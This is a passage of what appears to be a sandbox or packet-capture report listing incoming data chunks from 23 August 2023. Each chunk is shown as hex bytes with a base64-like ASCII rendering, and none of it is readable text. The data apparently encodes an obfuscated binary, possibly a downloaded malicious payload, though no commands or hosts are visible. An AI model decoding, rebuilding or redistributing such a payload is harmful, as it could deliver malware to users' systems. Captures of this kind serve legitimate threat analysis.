31 68 62 54 5a Data Ascii: oeVdqAabwL3DnBa7d8bMnKUiLSXkmEvFFJLmwfRf5JPUoo2BdKWy4VZIRA7mxBKQxoQ38oXXFOYrgzzi5YFF89KPoeVlG0MSJlS0mC+f7+SBq/t2u7hW/CbWu8v23848FfZtfAQtSGQcoItywlHrdBZVdP6GJXfAruH/4GTVL6wfJ9Ic662bnmHW0U2hpF+YQTW9HG0jjSaBNk3x1YLxCQY7u50/rTF2VpOPbPG7lpXUTFsylryc3RWX301hbTZ
2023-08-23 17:31:32 UTC	2536	IN	Data Raw: 67 72 53 6d 76 38 56 43 72 58 51 78 2f 31 76 2f 54 47 48 4c 67 69 7a 73 54 48 4e 64 64 65 4c 66 31 4e 48 6b 6b 46 65 6d 39 44 45 73 62 49 74 72 6e 75 33 32 6c 4a 51 6a 77 4c 78 53 43 36 61 37 76 41 73 31 54 6a 53 53 34 4a 52 57 66 4f 50 56 49 55 7a 73 37 47 73 59 4d 63 52 6b 68 4f 69 30 78 58 45 41 45 52 75 38 7a 44 78 6f 36 79 38 4d 30 67 59 38 41 44 6a 6d 36 32 66 42 37 49 77 32 56 30 34 6c 57 39 59 78 74 57 79 32 39 6b 52 6e 45 41 77 56 51 50 4d 44 72 35 77 6d 52 70 51 50 54 47 47 63 73 61 79 72 65 32 6f 4e 5a 5a 4b 51 72 47 75 73 4b 6a 49 47 4d 38 36 55 32 4b 46 37 6d 36 78 68 6a 57 51 73 70 4f 47 72 54 69 61 31 77 46 79 37 4a 6c 56 69 6c 70 61 45 54 57 79 74 47 39 39 34 6a 4a 42 59 4d 31 54 7a 4a 72 5a 63 62 76 46 6f 53 42 58 6f 57 46 57 56 45 38 2f Data Ascii: grSmv8VCrXQx/1v/TGHLgizsTHNddeLf1NHkkFem9DEsbItrnu32lJQjwLxSC6a7vAs1TjSS4JRWfOPVIUzs7GsYMcRkhOi0xXEAERu8zDxo6y8M0gY8ADjm62fB7Iw2V04lW9YxtWy29kRnEAwVQPMDr5wmRpQPTGGcsayre2oNZZKQrGusKjIGM86U2KF7m6xhjWQspOGrTia1wFy7JlVilpaETWytG994jJBYM1TzJrZcbvFoSBXoWFWVE8/
2023-08-23 17:31:32 UTC	2552	IN	Data Raw: 58 42 50 68 5a 73 79 78 78 67 78 73 79 33 47 6f 4a 59 75 38 61 38 53 78 79 34 55 41 74 59 4b 6a 6f 39 76 72 33 4c 56 68 52 68 52 50 6d 38 79 38 64 41 6d 54 46 72 41 72 71 38 76 76 69 66 4a 72 72 41 7a 68 6d 41 4f 69 68 6f 48 62 2f 45 78 75 53 66 53 4d 42 6a 63 66 68 73 75 38 6e 48 79 6c 30 69 68 72 6d 37 73 35 77 5a 57 37 51 67 76 2f 35 47 50 6c 73 67 54 53 5a 47 30 41 52 57 50 51 4d 61 7a 73 37 46 6e 32 31 49 76 55 67 2f 61 74 48 4d 77 4d 35 2f 63 45 75 37 48 56 56 7a 47 62 6c 6f 75 37 71 30 67 39 4c 74 59 6c 74 59 69 53 33 55 74 64 44 58 68 55 45 6d 57 78 7a 41 79 38 46 63 61 49 64 46 56 54 38 75 5a 42 5a 48 53 6a 4d 63 49 62 74 6f 4d 67 4a 76 45 33 48 4a 59 7a 4d 4c 63 47 4c 6f 4e 62 33 47 79 73 31 64 47 33 38 4c 4a 67 4a 6b 76 64 43 30 54 57 78 51 79 Data Ascii: XBPhZsyxxgxsy3GoJYu8a8Sxy4UAtYKjo9vr3LVhRhRPm8y8dAmTFrArq8vvifJrrAzhmAOihoHb/ExuSfSMBjcfhsu8nHyl0ihrm7s5wZW7Qgv/5GPlsgTSZG0ARWPQMazs7Fn21IvUg/atHMwM5/cEu7HVVzGblou7q0g9LtYltYiS3UtdDXhUEmWxzAy8FcaIdFVT8uZBZHSjMcIbtoMgJvE3HJYzMLcGLoNb3Gys1dG38LJgJkvdC0TWxQy
2023-08-23 17:31:32 UTC	2568	IN	Data Raw: 69 39 7a 63 76 69 31 6e 43 52 36 38 4e 39 77 38 78 63 4e 65 77 35 4a 6d 45 63 76 38 32 66 74 64 59 38 49 32 73 56 55 31 76 51 73 79 79 70 32 46 6c 4a 7a 63 78 4d 47 39 67 79 49 32 64 72 51 2f 2b 2f 62 55 55 39 41 78 71 4e 41 4f 68 70 52 59 56 6b 45 51 33 50 75 56 55 4b 35 72 63 5a 46 38 4c 50 53 77 33 72 4e 33 45 59 5a 38 72 51 6e 78 2f 59 4c 69 52 77 46 4e 6b 52 74 79 62 44 79 56 6f 51 37 73 64 30 58 44 38 2b 46 42 31 77 4f 77 6a 4a 75 47 47 38 74 2b 7a 72 30 7a 59 79 48 57 56 51 77 63 64 52 7a 75 34 36 49 78 6b 63 52 31 48 42 46 69 4d 49 65 57 37 4a 77 55 4b 6f 36 4d 77 59 50 43 34 56 61 44 32 4a 47 37 6d 34 75 2b 33 53 55 44 39 6c 46 4c 32 38 63 30 66 77 55 6f 49 67 77 6d 4a 68 53 2b 73 57 7a 73 6a 31 62 64 4b 39 48 48 4c 64 2f 6f 55 57 79 75 52 68 76 Data Ascii: i9zcvi1nCR68N9w8xcNew5JmEcv82ftdY8I2sVU1vQsyyp2FlJzcxMG9gyI2drQ/+/bUU9AxqNAOhpRYVkEQ3PuVUK5rcZF8LPSw3rN3EYZ8rQnx/YLiRwFNkRtybDyVoQ7sd0XD8+FB1wOwjJuGG8t+zr0zYyHWVQwcdRzu46IxkcR1HBFiMIeW7JwUKo6MwYPC4VaD2JG7m4u+3SUD9lFL28c0fwUoIgwmJhS+sWzsj1bdK9HHLd/oUWyuRhv
2023-08-23 17:31:32 UTC	2584	IN	Data Raw: 33 4a 79 37 6a 53 30 38 6b 57 59 4e 39 2f 58 34 64 34 45 6e 69 76 53 45 79 2f 42 74 41 72 48 56 35 34 58 37 76 4e 67 55 62 65 78 79 46 4d 63 52 68 6e 7a 66 57 39 76 49 51 74 38 4c 6f 57 54 7a 4a 72 59 63 58 38 79 63 39 36 4d 4f 4e 56 50 78 5a 6b 77 2f 78 75 43 44 71 7a 61 4c 79 33 6b 38 4c 54 57 6c 6b 31 49 57 52 56 48 4d 63 65 48 4c 76 36 76 50 33 41 79 48 5a 5a 35 6c 6e 50 4d 56 31 48 53 62 6c 6a 61 54 44 55 48 73 66 67 49 66 45 54 54 33 52 6a 69 54 47 38 46 43 71 71 61 6d 4c 41 5a 79 32 61 6e 78 35 4a 4a 52 30 67 78 32 38 6d 70 6e 41 54 74 6a 38 65 59 73 6c 77 4a 70 49 59 47 72 6b 57 50 71 7a 49 76 4d 37 72 64 72 4d 38 48 68 76 6e 2f 38 59 6d 45 78 78 46 66 78 5a 41 43 30 30 2b 76 44 33 47 47 69 39 6b 4e 62 64 68 4e 5a 61 48 56 41 37 46 5a 6a 75 76 7a Data Ascii: 3Jy7jS08kWYN9/X4d4EnivSEy/BtArHV54X7vNgUbexyFMcRhnzfW9vIQt8LoWTzJrYcX8yc96MONVPxZkw/xuCDqzaLy3k8LTWlk1IWRVHMceHLv6vP3AyHZZ5lnPMV1HSbljaTDUHsfgIfETT3RjiTG8FCqqamLAZy2anx5JJR0gx28mpnATtj8eYslwJpIYGrkWPqzIvM7rdrM8Hhvn/8YmExxFfxZAC00+vD3GGi9kNbdhNZaHVA7FZjuvz
2023-08-23 17:31:32 UTC	2600	IN	Data Raw: 62 48 78 48 59 6b 34 6c 59 39 62 68 76 45 38 6c 61 2f 7a 59 4d 32 31 6a 77 6a 61 78 56 5a 55 56 47 32 76 50 57 4c 37 55 6c 46 4d 68 31 6c 56 57 50 47 7a 5a 44 75 30 70 46 6e 79 63 46 2b 6f 2b 61 2b 48 31 52 78 62 47 47 2f 42 73 2b 35 64 63 54 6d 64 32 62 4d 77 33 6d 4c 33 31 5a 49 63 52 68 6e 31 6a 33 4b 39 4d 42 6e 4b 7a 70 43 50 63 70 69 72 62 77 53 79 66 7a 39 77 4d 75 34 39 74 66 51 44 38 64 6d 4a 54 5a 45 4d 72 73 57 71 72 31 64 7a 66 38 4d 75 78 32 73 65 55 32 32 78 67 6e 47 76 49 51 79 37 73 72 4f 78 41 54 67 75 6d 47 74 61 56 2f 50 52 63 75 2b 64 42 54 55 67 78 2f 4f 75 49 35 45 38 56 31 41 46 78 6e 4f 43 62 32 2f 75 66 66 72 30 63 4c 54 35 74 66 44 79 58 31 39 37 6c 43 48 61 46 54 53 61 73 62 4a 65 43 54 75 53 7a 4d 5a 61 38 44 2b 76 4d 33 4d 2b Data Ascii: bHxHYk4lY9bhvE8la/zYM21jwjaxVZUVG2vPWL7UlFMh1lVWPGzZDu0pFnycF+o+a+H1RxbGG/Bs+5dcTmd2bMw3mL31ZIcRhn1j3K9MBnKzpCPcpirbwSyfz9wMu49tfQD8dmJTZEMrsWqr1dzf8Mux2seU22xgnGvIQy7srOxATgumGtaV/PRcu+dBTUgx/OuI5E8V1AFxnOCb2/uffr0cLT5tfDyX197lCHaFTSasbJeCTuSzMZa8D+vM3M+
2023-08-23 17:31:32 UTC	2616	IN	Data Raw: 4e 68 59 59 39 42 58 72 63 66 7a 52 38 63 52 6b 68 51 57 55 54 6f 59 6c 64 38 43 75 34 66 2f 6f 42 72 78 4d 61 35 6a 4e 58 62 46 72 6f 67 44 66 63 42 78 2b 56 55 7a 63 6a 49 76 42 4d 63 30 57 47 77 5a 31 36 36 77 76 62 47 78 32 79 65 43 30 79 32 78 2f 2b 2f 30 66 58 4e 79 67 79 37 41 30 37 47 7a 4d 36 2b 62 68 31 4a 76 68 77 63 4a 77 69 4f 47 62 6b 66 6c 67 4a 61 75 6c 72 47 47 4c 67 49 77 4c 7a 34 78 63 75 32 58 66 70 58 75 72 7a 42 7a 62 59 66 64 63 52 70 48 6c 7a 4f 78 4d 4c 50 30 78 62 72 48 6c 61 46 44 75 35 6f 43 67 35 33 47 38 6a 50 35 54 6a 6f 75 52 38 49 6e 50 7a 73 47 73 58 63 53 62 2f 42 75 72 4e 6a 48 4c 6b 50 78 52 54 77 48 73 70 70 6e 6d 31 54 76 62 5a 6a 77 76 50 50 74 32 2b 77 57 6c 6d 37 74 77 76 4f 75 67 48 45 58 55 52 4d 75 73 71 31 77 Data Ascii: NhYY9BXrcfzR8cRkhQWUToYld8Cu4f/oBrxMa5jNXbFrogDfcBx+VUzcjIvBMc0WGwZ166wvbGx2yeC0y2x/+/0fXNygy7A07GzM6+bh1JvhwcJwiOGbkflgJaulrGGLgIwLz4xcu2XfpXurzBzbYfdcRpHlzOxMLP0xbrHlaFDu5oCg53G8jP5TjouR8InPzsGsXcSb/BurNjHLkPxRTwHsppnm1TvbZjwvPPt2+wWlm7twvOugHEXURMusq1w
2023-08-23 17:31:32 UTC	2632	IN	Data Raw: 66 54 48 55 55 48 68 6d 74 59 52 37 72 42 36 50 7a 76 58 37 59 51 47 74 45 67 61 31 44 42 49 42 69 36 61 37 79 2f 4f 74 6e 6a 7a 57 46 69 55 45 6e 4a 75 42 36 7a 46 6c 56 5a 51 6b 2f 71 59 30 65 39 78 48 58 49 66 42 35 43 43 75 41 66 6a 47 77 49 38 30 52 78 43 57 56 45 4c 6b 5a 6f 75 4f 58 48 78 64 45 37 49 45 66 4a 47 6b 51 4c 7a 73 6d 2f 61 71 31 5a 77 57 78 49 4a 57 6b 57 79 64 64 68 76 48 39 71 78 66 41 69 57 54 55 5a 61 4c 2b 45 49 52 72 48 59 56 68 42 62 47 4e 62 7a 64 48 57 6a 75 46 4b 4a 6a 30 65 5a 33 41 42 6a 47 74 54 52 4c 76 4d 33 65 50 65 52 55 6f 6a 49 6d 68 4c 4c 79 34 69 5a 6c 73 75 59 68 7a 52 77 79 4d 61 31 79 67 6c 5a 42 6c 4a 55 4d 79 37 5a 56 30 38 61 52 31 6b 35 63 62 51 74 4e 37 68 56 79 66 32 53 46 72 48 4f 6c 73 2b 57 30 39 59 4a Data Ascii: fTHUUHhmtYR7rB6PzvX7YQGtEga1DBIBi6a7y/OtnjzWFiUEnJuB6zFlVZQk/qY0e9xHXIfB5CCuAfjGwI80RxCWVELkZouOXHxdE7IEfJGkQLzsm/aq1ZwWxIJWkWyddhvH9qxfAiWTUZaL+EIRrHYVhBbGNbzdHWjuFKJj0eZ3ABjGtTRLvM3ePeRUojImhLLy4iZlsuYhzRwyMa1yglZBlJUMy7ZV08aR1k5cbQtN7hVyf2SFrHOls+W09YJ
2023-08-23 17:31:32 UTC	2648	IN	Data Raw: 6a 42 69 63 6e 41 68 50 76 6f 55 6a 41 55 46 4c 38 69 43 70 6e 34 56 2f 4c 67 46 72 32 37 46 6b 48 6d 4e 6e 45 55 46 4d 66 46 5a 57 48 69 5a 7a 31 75 47 38 6e 4f 62 52 6a 6a 51 6a 38 57 5a 4d 62 49 55 36 76 75 53 7a 4d 5a 61 31 42 65 76 4d 31 59 44 39 4e 45 50 6d 6b 58 36 52 35 48 78 72 78 63 2b 2b 35 6b 4c 6d 51 68 36 57 6a 4a 77 41 4c 56 36 43 55 77 46 42 53 2f 49 67 6f 45 2b 45 5a 50 77 38 6d 36 68 44 38 69 46 4c 6f 67 41 66 65 47 78 64 46 72 6e 65 39 46 4b 47 73 63 7a 73 6b 5a 6b 39 49 62 50 68 51 64 79 4d 35 6c 70 2b 67 2f 51 52 74 6b 77 72 78 57 7a 4e 39 65 50 42 59 64 57 55 72 4a 76 56 6c 37 37 6a 55 6d 61 42 54 65 48 30 71 39 79 51 47 4b 31 57 59 31 5a 6d 54 4f 47 2f 30 31 66 31 2b 35 75 50 35 6b 30 67 30 2f 5a 52 52 4b 75 73 44 4f 66 43 6f 62 49 Data Ascii: jBicnAhPvoUjAUFL8iCpn4V/LgFr27FkHmNnEUFMfFZWHiZz1uG8nObRjjQj8WZMbIU6vuSzMZa1BevM1YD9NEPmkX6R5Hxrxc++5kLmQh6WjJwALV6CUwFBS/IgoE+EZPw8m6hD8iFLogAfeGxdFrne9FKGsczskZk9IbPhQdyM5lp+g/QRtkwrxWzN9ePBYdWUrJvVl77jUmaBTeH0q9yQGK1WY1ZmTOG/01f1+5uP5k0g0/ZRRKusDOfCobI
2023-08-23 17:31:32 UTC	2664	IN	Data Raw: 68 4e 76 67 58 41 79 63 63 69 39 31 45 35 42 6d 4c 71 4b 38 57 37 79 70 56 69 57 39 46 6b 59 46 4e 45 78 68 56 53 6e 38 4f 30 78 6d 4e 62 72 71 53 35 55 59 51 51 77 62 6f 43 48 2b 53 34 4c 68 56 6f 79 32 69 62 32 6c 48 45 4f 2f 57 37 75 73 6f 54 69 74 4a 54 59 68 35 53 78 69 68 77 47 31 67 4a 78 32 34 76 46 37 2f 4d 5a 58 37 57 76 47 73 62 58 38 59 6d 61 6d 75 32 39 4d 42 73 50 52 75 37 61 30 50 41 56 59 50 38 74 73 6e 35 58 39 50 4f 50 57 77 59 7a 73 37 46 76 4e 4c 59 59 37 36 38 52 52 6e 6b 64 42 62 4f 5a 6c 6f 6e 57 32 70 65 37 78 4e 45 75 37 72 4b 4a 74 4f 36 77 4d 54 59 36 75 41 67 32 65 79 2f 5a 35 57 2b 53 38 6b 4e 2b 4c 67 41 66 6d 74 51 67 78 76 4f 78 31 34 44 30 34 41 72 77 72 79 57 62 39 39 4a 39 38 47 4e 47 57 44 71 63 4d 61 38 75 68 62 75 33 Data Ascii: hNvgXAycci91E5BmLqK8W7ypViW9FkYFNExhVSn8O0xmNbrqS5UYQQwboCH+S4LhVoy2ib2lHEO/W7usoTitJTYh5SxihwG1gJx24vF7/MZX7WvGsbX8Ymamu29MBsPRu7a0PAVYP8tsn5X9POPWwYzs7FvNLYY768RRnkdBbOZlonW2pe7xNEu7rKJtO6wMTY6uAg2ey/Z5W+S8kN+LgAfmtQgxvOx14D04ArwryWb99J98GNGWDqcMa8uhbu3
2023-08-23 17:31:32 UTC	2680	IN	Data Raw: 46 65 4d 50 30 57 77 4c 76 4d 54 75 6c 44 52 55 49 6a 49 6d 6a 6c 46 38 34 66 72 75 42 4b 78 38 4c 31 78 76 6c 63 66 38 54 48 4b 49 37 47 57 7a 45 50 62 63 47 2f 76 57 6a 70 35 78 37 51 46 51 39 31 43 56 78 44 55 31 31 45 67 41 37 62 47 2f 78 2f 48 72 73 68 43 37 6f 63 48 73 5a 68 46 6c 36 32 76 62 6f 4e 31 72 31 73 41 78 6b 4a 79 39 53 38 62 66 6d 70 44 38 41 47 76 32 37 4d 5a 63 31 70 72 74 4a 63 30 56 6a 46 30 63 48 61 45 32 46 55 33 32 45 56 78 68 37 31 55 51 52 4f 78 47 51 62 54 49 6f 57 7a 37 62 48 70 4e 6a 46 48 2f 34 44 44 72 75 37 61 30 72 6a 52 31 32 39 78 73 62 57 61 52 7a 4b 7a 52 33 49 34 62 72 47 76 37 72 5a 61 34 42 63 77 47 6f 4c 4b 50 4c 46 30 62 59 31 32 32 52 31 75 37 71 34 33 6d 35 6d 76 39 47 38 58 65 62 63 5a 52 76 37 44 47 65 2b 47 Data Ascii: FeMP0WwLvMTulDRUIjImjlF84fruBKx8L1xvlcf8THKI7GWzEPbcG/vWjp5x7QFQ91CVxDU11EgA7bG/x/HrshC7ocHsZhFl62vboN1r1sAxkJy9S8bfmpD8AGv27MZc1prtJc0VjF0cHaE2FU32EVxh71UQROxGQbTIoWz7bHpNjFH/4DDru7a0rjR129xsbWaRzKzR3I4brGv7rZa4BcwGoLKPLF0bY122R1u7q43m5mv9G8XebcZRv7DGe+G
2023-08-23 17:31:32 UTC	2696	IN	Data Raw: 45 55 78 74 43 31 69 4f 47 34 63 47 64 49 2b 62 69 38 34 31 50 78 79 79 42 71 46 67 43 36 78 68 6f 77 65 4d 75 49 6b 57 6d 36 62 7a 64 79 6e 6b 66 62 49 4d 44 4f 35 39 44 6a 30 78 4f 32 49 69 76 68 6f 62 77 68 2b 74 61 49 75 73 44 58 78 65 72 67 49 4d 70 77 4e 39 53 6b 78 6d 76 35 64 48 6d 36 76 65 64 56 38 64 6b 54 7a 6d 38 71 35 61 43 35 48 76 4a 37 65 4d 71 33 34 6a 66 57 31 78 6d 35 59 67 31 31 69 66 50 36 77 43 43 2b 46 73 57 35 35 49 4c 58 64 6d 58 57 61 38 75 2f 31 43 6e 55 67 78 2f 4f 75 65 2b 36 38 63 70 6d 74 53 39 6b 5a 72 6f 44 30 63 66 6c 51 75 79 43 48 63 44 44 33 73 76 70 7a 6a 78 6e 5a 72 30 46 77 4d 6e 48 6d 4f 66 47 30 4c 6c 38 34 66 41 66 73 32 55 61 54 4c 75 37 2b 34 62 6a 52 38 6d 39 32 2f 37 75 64 78 37 4e 30 64 63 36 34 62 49 6d 46 Data Ascii: EUxtC1iOG4cGdI+bi841PxyyBqFgC6xhoweMuIkWm6bzdynkfbIMDO59Dj0xO2Iivhobwh+taIusDXxergIMpwN9Skxmv5dHm6vedV8dkTzm8q5aC5HvJ7eMq34jfW1xm5Yg11ifP6wCC+FsW55ILXdmXWa8u/1CnUgx/Oue+68cpmtS9kZroD0cflQuyCHcDD3svpzjxnZr0FwMnHmOfG0Ll84fAfs2UaTLu7+4bjR8m92/7udx7N0dc64bImF
2023-08-23 17:31:32 UTC	2712	IN	Data Raw: 2f 74 78 54 62 79 78 45 68 78 41 62 72 46 4c 76 2b 39 76 39 48 48 4a 75 66 79 6b 66 6d 33 5a 78 33 44 42 38 5a 66 4c 6e 44 5a 5a 45 58 47 79 4d 34 46 37 2f 35 79 44 63 45 64 48 37 34 45 79 6c 59 2b 61 74 49 62 56 48 4a 62 75 73 4b 66 45 64 64 54 78 51 76 50 50 67 35 36 4e 62 73 2b 46 78 52 30 78 44 78 73 59 33 2f 50 4a 32 6c 73 42 37 43 79 42 58 56 64 70 72 33 54 36 33 72 46 30 43 6f 44 49 46 46 47 33 59 57 46 48 75 47 42 58 73 4e 78 48 32 52 55 42 49 34 64 77 69 5a 69 61 59 43 39 66 42 65 37 30 57 58 79 30 37 51 2b 42 4d 79 39 4a 76 2f 47 53 59 61 38 79 6a 4a 73 46 6f 61 39 66 68 61 2f 76 56 44 45 33 38 67 38 43 38 43 34 4d 51 6a 4f 52 6e 66 49 7a 58 45 67 5a 59 6d 43 64 6e 5a 30 67 6f 79 4f 67 70 43 47 69 33 4f 51 68 46 76 52 78 54 47 68 30 72 30 62 62 Data Ascii: /txTbyxEhxAbrFLv+9v9HHJufykfm3Zx3DB8ZfLnDZZEXGyM4F7/5yDcEdH74EylY+atIbVHJbusKfEddTxQvPPg56Nbs+FxR0xDxsY3/PJ2lsB7CyBXVdpr3T63rF0CoDIFFG3YWFHuGBXsNxH2RUBI4dwiZiaYC9fBe70WXy07Q+BMy9Jv/GSYa8yjJsFoa9fha/vVDE38g8C8C4MQjORnfIzXEgZYmCdnZ0goyOgpCGi3OQhFvRxTGh0r0bb
2023-08-23 17:31:32 UTC	2728	IN	Data Raw: 54 79 4e 66 49 75 38 68 6a 79 4e 76 49 6f 38 6a 58 79 5a 50 49 79 38 6a 48 79 4e 2f 49 31 38 6a 4c 79 4c 2f 49 76 38 69 6a 79 4a 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 4a 76 49 69 38 6d 33 79 4e 76 49 6b 38 6a 58 79 5a 76 49 6b 38 6a 62 79 61 50 49 6f 38 6a 66 79 5a 50 49 6b 38 69 2f 79 4c 2f 49 6f 38 6a 58 79 45 2f 49 6b 38 6a 62 79 4e 76 49 36 38 6a 4c 79 4e 66 49 6e 38 6d 54 79 4d 76 49 77 38 6a 50 79 4c 2f 49 6f 38 6a 76 79 4c 50 49 33 38 6a 7a 79 38 76 4c 79 38 76 4c 79 38 76 49 6d 38 69 4c 79 62 66 49 32 38 69 54 79 4e 66 4a 6d 38 69 54 79 4e 76 4a 6f 38 69 6a 79 4e 2f 4a 6b 38 6a 4c 79 4d 66 49 33 38 6a 58 79 4d 76 49 76 38 69 2f 79 4b 50 49 6e 38 68 6a 79 4e 76 49 6f 38 6a 58 79 4e 76 4a 71 38 6a 48 79 4b 66 49 79 38 76 4c 79 61 76 49 78 38 Data Ascii: TyNfIu8hjyNvIo8jXyZPIy8jHyN/I18jLyL/Iv8ijyJ/Ly8vLy8vLy8vLyJvIi8m3yNvIk8jXyZvIk8jbyaPIo8jfyZPIk8i/yL/Io8jXyE/Ik8jbyNvI68jLyNfIn8mTyMvIw8jPyL/Io8jvyLPI38jzy8vLy8vLy8vIm8iLybfI28iTyNfJm8iTyNvJo8ijyN/Jk8jLyMfI38jXyMvIv8i/yKPIn8hjyNvIo8jXyNvJq8jHyKfIy8vLyavIx8
2023-08-23 17:31:32 UTC	2744	IN	Data Raw: 4c 79 38 76 4c 79 38 76 72 79 38 76 4b 41 2b 78 76 7a 2b 76 4c 36 38 67 56 69 41 76 4b 69 2b 32 6e 79 43 76 4c 36 38 6a 50 79 45 76 4c 36 38 76 4a 70 38 76 4c 79 38 6c 54 79 55 66 4a 52 59 66 4c 79 38 76 4a 4e 38 6d 48 79 5a 2f 6a 38 39 2f 4c 79 38 2f 4c 79 38 76 4c 79 2b 76 4c 79 38 72 4c 37 2f 66 4c 36 38 72 62 37 2f 66 4d 43 38 76 62 35 61 66 49 4b 38 76 72 79 41 76 4d 53 38 73 4c 37 4d 2f 4a 4a 38 76 72 79 38 6d 6e 79 38 76 4c 79 56 66 49 43 38 6c 48 53 38 76 4c 79 38 6c 6e 79 59 66 4a 6c 39 50 7a 7a 38 76 4c 79 38 76 4c 79 38 76 49 4b 38 2f 4c 79 79 76 73 7a 38 76 72 79 2b 76 4c 79 61 66 4c 79 38 76 4a 57 38 68 4c 79 55 57 48 79 38 76 4c 79 53 2f 4c 36 38 6d 62 32 2f 50 58 7a 38 76 4c 79 38 76 4c 79 38 76 72 79 38 76 4c 4f 2b 32 6e 79 2b 76 4c 2f 38 Data Ascii: Ly8vLy8vry8vKA+xvz+vL68gViAvKi+2nyCvL68jPyEvL68vJp8vLy8lTyUfJRYfLy8vJN8mHyZ/j89/Ly8/Ly8vLy+vLy8rL7/fL68rb7/fMC8vb5afIK8vryAvMS8sL7M/JJ8vry8mny8vLyVfIC8lHS8vLy8lnyYfJl9Pzz8vLy8vLy8vIK8/Lyyvsz8vry+vLyafLy8vJW8hLyUWHy8vLyS/L68mb2/PXz8vLy8vLy8vry8vLO+2ny+vL/8
2023-08-23 17:31:32 UTC	2760	IN	Data Raw: 54 79 54 50 39 48 38 76 72 79 38 2f 49 54 36 6c 46 69 38 76 49 44 38 72 72 6f 41 77 62 30 38 67 54 7a 39 50 4a 4d 2f 30 66 79 41 76 4c 7a 38 6d 66 75 55 57 4c 79 38 67 50 79 6f 4f 67 44 38 2f 54 79 54 50 39 48 38 67 4c 79 38 2f 4a 52 37 6c 46 69 38 76 49 44 2b 76 6f 66 41 2f 59 4b 38 6b 4c 31 38 76 49 4c 38 76 4c 79 38 2f 4c 78 38 66 48 78 38 76 4a 74 38 75 37 75 48 78 34 4d 39 51 4c 79 38 76 4c 34 38 76 70 68 56 78 34 45 38 38 37 78 55 57 4c 79 38 67 50 7a 31 4f 34 44 38 6c 76 76 41 2f 62 30 38 6c 47 53 38 76 4d 44 39 76 54 79 55 64 50 79 38 6c 46 69 38 76 49 44 42 76 54 79 42 50 50 30 38 6b 7a 2f 52 2f 4c 36 38 76 50 79 39 50 4a 52 38 76 51 7a 39 50 4c 79 38 67 6a 79 39 66 4c 79 38 68 4c 79 38 66 45 4e 38 76 50 79 43 2f 4c 79 38 76 50 79 39 42 34 4d 39 Data Ascii: TyTP9H8vry8/IT6lFi8vID8rroAwb08gTz9PJM/0fyAvLz8mfuUWLy8gPyoOgD8/TyTP9H8gLy8/JR7lFi8vID+vofA/YK8kL18vIL8vLy8/Lx8fHx8vJt8u7uHx4M9QLy8vL48vphVx4E887xUWLy8gPz1O4D8lvvA/b08lGS8vMD9vTyUdPy8lFi8vIDBvTyBPP08kz/R/L68vPy9PJR8vQz9PLy8gjy9fLy8hLy8fEN8vPyC/Ly8vPy9B4M9
2023-08-23 17:31:32 UTC	2776	IN	Data Raw: 66 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 73 4c 39 38 32 48 7a 38 76 4c 79 34 74 2f 79 59 66 50 79 38 76 4b 69 74 66 4a 68 38 2f 4c 79 38 67 4a 62 38 6d 48 7a 38 76 4c 79 41 6f 58 79 59 66 50 79 38 76 49 53 35 50 4a 68 38 2f 4c 79 38 73 4b 38 38 6d 48 7a 38 76 4c 79 63 71 44 79 59 66 50 79 38 76 49 53 2f 76 4e 68 38 2f 4c 79 38 76 49 79 38 6d 48 7a 38 76 4c 79 73 75 7a 79 59 66 50 79 38 76 49 53 58 66 4a 68 38 2f 4c 79 38 6d 47 4e 38 6d 48 7a 38 76 4c 79 30 6c 2f 79 59 66 50 79 38 76 4b 69 38 50 4a 68 38 2f 4c 79 38 68 4f 36 38 6d 48 7a 38 76 4c 79 67 73 76 79 59 66 50 79 38 76 4b 43 6c 76 4a 68 38 2f 4c 79 38 6e 49 30 38 6d 48 7a 38 76 4c 79 45 6d 72 79 59 66 50 79 38 76 4c 43 36 50 4a 68 38 2f 4c 79 38 72 4b 4b 38 6d 48 7a 38 76 4c 79 77 73 58 79 59 Data Ascii: fy8vLy8vLy8vLy8sL982Hz8vLy4t/yYfPy8vKitfJh8/Ly8gJb8mHz8vLyAoXyYfPy8vIS5PJh8/Ly8sK88mHz8vLycqDyYfPy8vIS/vNh8/Ly8vIy8mHz8vLysuzyYfPy8vISXfJh8/Ly8mGN8mHz8vLy0l/yYfPy8vKi8PJh8/Ly8hO68mHz8vLygsvyYfPy8vKClvJh8/Ly8nI08mHz8vLyEmryYfPy8vLC6PJh8/Ly8rKK8mHz8vLywsXyY
2023-08-23 17:31:32 UTC	2792	IN	Data Raw: 50 79 38 76 4c 69 38 76 4c 79 45 76 4c 79 38 6d 48 79 54 66 4e 4a 38 76 4c 79 53 76 4c 79 38 76 72 79 38 76 4c 79 38 76 4c 79 39 2f 4c 36 38 6a 4e 68 38 76 4c 79 38 76 4c 79 6a 70 76 79 59 66 50 79 38 76 4c 36 38 76 4c 79 38 76 4c 79 38 72 4b 58 38 6d 48 7a 38 76 4c 79 2f 66 50 79 38 76 72 79 38 76 4c 45 6c 50 4a 68 38 2f 4c 79 38 72 72 79 38 76 49 43 38 76 4c 79 67 76 7a 7a 59 66 50 79 38 76 4c 39 38 2f 4c 79 43 76 4c 79 38 6d 6e 46 38 6d 48 7a 38 76 4c 79 34 76 4c 79 38 68 4c 79 38 76 4a 68 38 6d 2f 7a 45 76 4c 79 38 6d 6e 79 38 76 4c 36 38 76 4c 79 38 76 4c 79 38 76 62 79 2b 76 49 30 38 76 4c 79 38 76 72 79 38 6e 71 78 38 6d 48 7a 38 76 4c 79 2f 66 4c 79 38 76 4c 79 38 76 49 53 34 76 4a 68 38 2f 4c 79 38 76 7a 7a 38 76 4c 36 38 76 4c 79 77 6c 72 79 59 Data Ascii: Py8vLi8vLyEvLy8mHyTfNJ8vLySvLy8vry8vLy8vLy9/L68jNh8vLy8vLyjpvyYfPy8vL68vLy8vLy8rKX8mHz8vLy/fPy8vry8vLElPJh8/Ly8rry8vIC8vLygvzzYfPy8vL98/LyCvLy8mnF8mHz8vLy4vLy8hLy8vJh8m/zEvLy8mny8vL68vLy8vLy8vby+vI08vLy8vry8nqx8mHz8vLy/fLy8vLy8vIS4vJh8/Ly8vzz8vL68vLywlryY
